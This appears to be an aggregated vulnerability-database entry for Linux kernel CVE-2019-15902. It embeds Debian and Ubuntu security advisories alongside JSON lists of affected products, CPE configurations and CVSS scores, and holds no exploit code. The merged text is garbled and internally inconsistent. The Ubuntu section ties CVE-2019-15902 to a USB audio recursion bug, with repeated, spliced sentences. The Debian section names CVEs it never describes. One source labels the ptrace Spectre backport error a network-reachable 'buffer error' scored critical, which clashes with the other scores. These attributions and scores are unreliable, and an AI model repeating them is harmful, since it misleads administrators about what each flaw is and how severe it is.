Package : linux CVE ID : CVE-2019-14821 CVE-2019-14835 CVE-2019-15117 CVE-2019-15118 CVE-2019-15902

Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

CVE-2019-14821

Matt Delco reported a race condition in KVM's coalesced MMIO
facility, which could lead to out-of-bounds access in the kernel.

CVE-2019-14835

Peter Pi of Tencent Blade Team discovered a missing bounds check
in vhost_net, the network back-end driver for KVM hosts, leading
to a buffer overflow when the host begins live migration of a VM.  On the amd64 architecture, and on the
arm64 architecture in buster, this is mitigated by a guard page
on the kernel stack, so that it is only possible to cause a crash.

CVE-2019-15902

Brad Spengler reported that a backporting error reintroduced a
spectre-v1 vulnerability in the ptrace subsystem in the
ptrace_get_debugreg() function.

For the oldstable distribution (stretch), these problems have been fixed in version 4.9.189-3+deb9u1.

For the stable distribution (buster), these problems have been fixed in version 4.19.67-2+deb10u1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl2K5xlfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Sj8xAAnBGWzlmy5RyQe8VCE3kkMpwmH/00I5IFpjTbAVvyHzKVYl96YbY1YuAP ID++cBxBElWCQriwCESc5Um/BGpOMmTa3VlkXIVy6uHgwt1Hn+ZW/syFaGt0/brW eKIecVQLyZaV7OOx4Q+J9H5WN1FNKoV3BCsfUFlRqNCUtYQ46X7pN+gyytW4KbZo AEbPkEdUhv2Z6ndq8Z/OJ5cyYms+OonEt08e2qcN0Ig+qRY9l3fgSn/X3tKQiuJj jGKPkd0VYrFzfDKekcboIBZyegahReRe4k+V8I+o/acuQJGR1cV/qCGxboFFI2+s WeSUhaVixP+7HLXyRljFBdvXlAnx/IajEPG+RAVt6zZs1yK+8bVIhai5TarcwbF3 DWQZvpAeLaKgIN4x7s7xDHNJzO9Ea9fhXm/9T1AoaO3wdN2zjOYHLG3YO4TF0PpF rYY9t17uNdAuCxPeQWCciDOiNQVbEmr3+al/78m2VZcBYEI2s1E9fgQJV21rRlv+ fEavwX9OJg6GKcW9v6cyegyf4gfTvjyzIP/rcmn55hiQ9vjVNykkoNUES5Do6sTb /pSSRuUpJtEE+6LnnqbdD0E6l8SC6zgA/+Pu/7BrACxlk9bhYFmVaAwbPPEuRgrz 3d87MB8FEHu4RDGSgomb849wuAXnEVDwM034VtURUSEAXVFQ0dY=Wqdv -----END PGP SIGNATURE----- . ========================================================================= Ubuntu Security Notice USN-4163-2 October 23, 2019

linux-lts-xenial, linux-aws vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-aws: Linux kernel for Amazon Web Services (AWS) systems - linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty

Details:

USN-4163-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 ESM.

It was discovered that a race condition existed in the ARC EMAC ethernet driver for the Linux kernel, resulting in a use-after-free vulnerability. An attacker could use this to cause a denial of service (system crash). (CVE-2016-10906)

It was discovered that a race condition existed in the Serial Attached SCSI (SAS) implementation in the Linux kernel when handling certain error conditions. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18232)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-21008)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14814, CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)

Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel did not properly validate device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15117)

Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel improperly performed recursion while handling device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). A physically proximate attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. A local attacker could possibly use this to expose sensitive information. (CVE-2019-15902)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-4.4.0-1056-aws 4.4.0-1056.60 linux-image-4.4.0-166-generic 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-generic-lpae 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-lowlatency 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-e500mc 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-smp 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-emb 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-smp 4.4.0-166.195~14.04.1 linux-image-aws 4.4.0.1056.57 linux-image-generic-lpae-lts-xenial 4.4.0.166.145 linux-image-generic-lts-xenial 4.4.0.166.145 linux-image-lowlatency-lts-xenial 4.4.0.166.145 linux-image-powerpc-e500mc-lts-xenial 4.4.0.166.145 linux-image-powerpc-smp-lts-xenial 4.4.0.166.145 linux-image-powerpc64-emb-lts-xenial 4.4.0.166.145 linux-image-powerpc64-smp-lts-xenial 4.4.0.166.145 linux-image-virtual-lts-xenial 4.4.0.166.145

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://usn.ubuntu.com/4163-2 https://usn.ubuntu.com/4163-1 CVE-2016-10906, CVE-2017-18232, CVE-2018-21008, CVE-2019-14814, CVE-2019-14816, CVE-2019-14821, CVE-2019-15117, CVE-2019-15118, CVE-2019-15505, CVE-2019-15902 . Please note that the RDS protocol is blacklisted in Ubuntu by default

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201909-1049",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2.11"
      },
      {
        "model": "baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.2"
      },
      {
        "model": "active iq performance analytics services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4"
      },
      {
        "model": "service processor",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.69"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.190"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.190"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.141"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.0"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.14.141 for up to  4.14.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.19.69 for up to  4.19.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.4.190 for up to  4.4.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.9.190 for up to  4.9.x"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "5.2.11 for up to  5.2.x"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.9.190",
                "versionStartIncluding": "4.9",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.14.141",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.19.69",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.2.11",
                "versionStartIncluding": "5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.4.190",
                "versionStartIncluding": "4.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_performance_analytics_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:service_processor:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Debian",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154606"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-15902",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-15902",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-147995",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CVE-2019-15902",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-15902",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-15902",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-15902",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201909-180",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-147995",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-15902",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-180"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A backporting error was discovered in the Linux stable/longterm kernel 4.4.x through 4.4.190, 4.9.x through 4.9.190, 4.14.x through 4.14.141, 4.19.x through 4.19.69, and 5.2.x through 5.2.11. Misuse of the upstream \"x86/ptrace: Fix possible spectre-v1 in ptrace_get_debugreg()\" commit reintroduced the Spectre vulnerability that it aimed to eliminate. This occurred because the backport process depends on cherry picking specific commits, and because two (correctly ordered) code lines were swapped. Linux Kernel Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability stems from configuration errors in network systems or products during operation. The following products and versions are affected: Linux kernel 4.4.x to 4.4.190, 4.9.x to 4.9.190, 4.14.x to 4.14.141, 4.19.x to 4.19.69, 5.2 .x versions up to 5.2.11. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4531-1                   security@debian.org\nhttps://www.debian.org/security/                     Salvatore Bonaccorso\nSeptember 25, 2019                    https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux\nCVE ID         : CVE-2019-14821 CVE-2019-14835 CVE-2019-15117 CVE-2019-15118\n                 CVE-2019-15902\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2019-14821\n\n    Matt Delco reported a race condition in KVM\u0027s coalesced MMIO\n    facility, which could lead to out-of-bounds access in the kernel. \n\nCVE-2019-14835\n\n    Peter Pi of Tencent Blade Team discovered a missing bounds check\n    in vhost_net, the network back-end driver for KVM hosts, leading\n    to a buffer overflow when the host begins live migration of a VM.  On the amd64 architecture, and on the\n    arm64 architecture in buster, this is mitigated by a guard page\n    on the kernel stack, so that it is only possible to cause a crash. \n\nCVE-2019-15902\n\n    Brad Spengler reported that a backporting error reintroduced a\n    spectre-v1 vulnerability in the ptrace subsystem in the\n    ptrace_get_debugreg() function. \n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 4.9.189-3+deb9u1. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 4.19.67-2+deb10u1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl2K5xlfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Sj8xAAnBGWzlmy5RyQe8VCE3kkMpwmH/00I5IFpjTbAVvyHzKVYl96YbY1YuAP\nID++cBxBElWCQriwCESc5Um/BGpOMmTa3VlkXIVy6uHgwt1Hn+ZW/syFaGt0/brW\neKIecVQLyZaV7OOx4Q+J9H5WN1FNKoV3BCsfUFlRqNCUtYQ46X7pN+gyytW4KbZo\nAEbPkEdUhv2Z6ndq8Z/OJ5cyYms+OonEt08e2qcN0Ig+qRY9l3fgSn/X3tKQiuJj\njGKPkd0VYrFzfDKekcboIBZyegahReRe4k+V8I+o/acuQJGR1cV/qCGxboFFI2+s\nWeSUhaVixP+7HLXyRljFBdvXlAnx/IajEPG+RAVt6zZs1yK+8bVIhai5TarcwbF3\nDWQZvpAeLaKgIN4x7s7xDHNJzO9Ea9fhXm/9T1AoaO3wdN2zjOYHLG3YO4TF0PpF\nrYY9t17uNdAuCxPeQWCciDOiNQVbEmr3+al/78m2VZcBYEI2s1E9fgQJV21rRlv+\nfEavwX9OJg6GKcW9v6cyegyf4gfTvjyzIP/rcmn55hiQ9vjVNykkoNUES5Do6sTb\n/pSSRuUpJtEE+6LnnqbdD0E6l8SC6zgA/+Pu/7BrACxlk9bhYFmVaAwbPPEuRgrz\n3d87MB8FEHu4RDGSgomb849wuAXnEVDwM034VtURUSEAXVFQ0dY=Wqdv\n-----END PGP SIGNATURE-----\n. =========================================================================\nUbuntu Security Notice USN-4163-2\nOctober 23, 2019\n\nlinux-lts-xenial, linux-aws vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty\n\nDetails:\n\nUSN-4163-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 ESM. \n\nIt was discovered that a race condition existed in the ARC EMAC ethernet\ndriver for the Linux kernel, resulting in a use-after-free vulnerability. \nAn attacker could use this to cause a denial of service (system crash). \n(CVE-2016-10906)\n\nIt was discovered that a race condition existed in the Serial Attached SCSI\n(SAS) implementation in the Linux kernel when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(kernel deadlock). (CVE-2017-18232)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-21008)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-14814,\nCVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel did not properly validate device meta data. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2019-15117)\n\nHui Peng and Mathias Payer discovered that the USB audio driver for the\nLinux kernel improperly performed recursion while handling device meta\ndata. A physically proximate attacker could use this to cause a denial of\nservice (system crash). A physically proximate attacker\ncould use this to cause a denial of service (system crash) or possibly\nexpose sensitive information. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2019-15902)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  linux-image-4.4.0-1056-aws      4.4.0-1056.60\n  linux-image-4.4.0-166-generic   4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-generic-lpae  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-lowlatency  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc-e500mc  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc-smp  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc64-emb  4.4.0-166.195~14.04.1\n  linux-image-4.4.0-166-powerpc64-smp  4.4.0-166.195~14.04.1\n  linux-image-aws                 4.4.0.1056.57\n  linux-image-generic-lpae-lts-xenial  4.4.0.166.145\n  linux-image-generic-lts-xenial  4.4.0.166.145\n  linux-image-lowlatency-lts-xenial  4.4.0.166.145\n  linux-image-powerpc-e500mc-lts-xenial  4.4.0.166.145\n  linux-image-powerpc-smp-lts-xenial  4.4.0.166.145\n  linux-image-powerpc64-emb-lts-xenial  4.4.0.166.145\n  linux-image-powerpc64-smp-lts-xenial  4.4.0.166.145\n  linux-image-virtual-lts-xenial  4.4.0.166.145\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4163-2\n  https://usn.ubuntu.com/4163-1\n  CVE-2016-10906, CVE-2017-18232, CVE-2018-21008, CVE-2019-14814,\n  CVE-2019-14816, CVE-2019-14821, CVE-2019-15117, CVE-2019-15118,\n  CVE-2019-15505, CVE-2019-15902\n. Please note that the RDS protocol is blacklisted in Ubuntu by\ndefault",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-15902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-008961"
      },
      {
        "db": "VULHUB",
        "id": "VHN-147995"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-15902"
      },
      {
        "db": "PACKETSTORM",
        "id": "154948"
      },
      {
        "db": "PACKETSTORM",
        "id": "154606"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
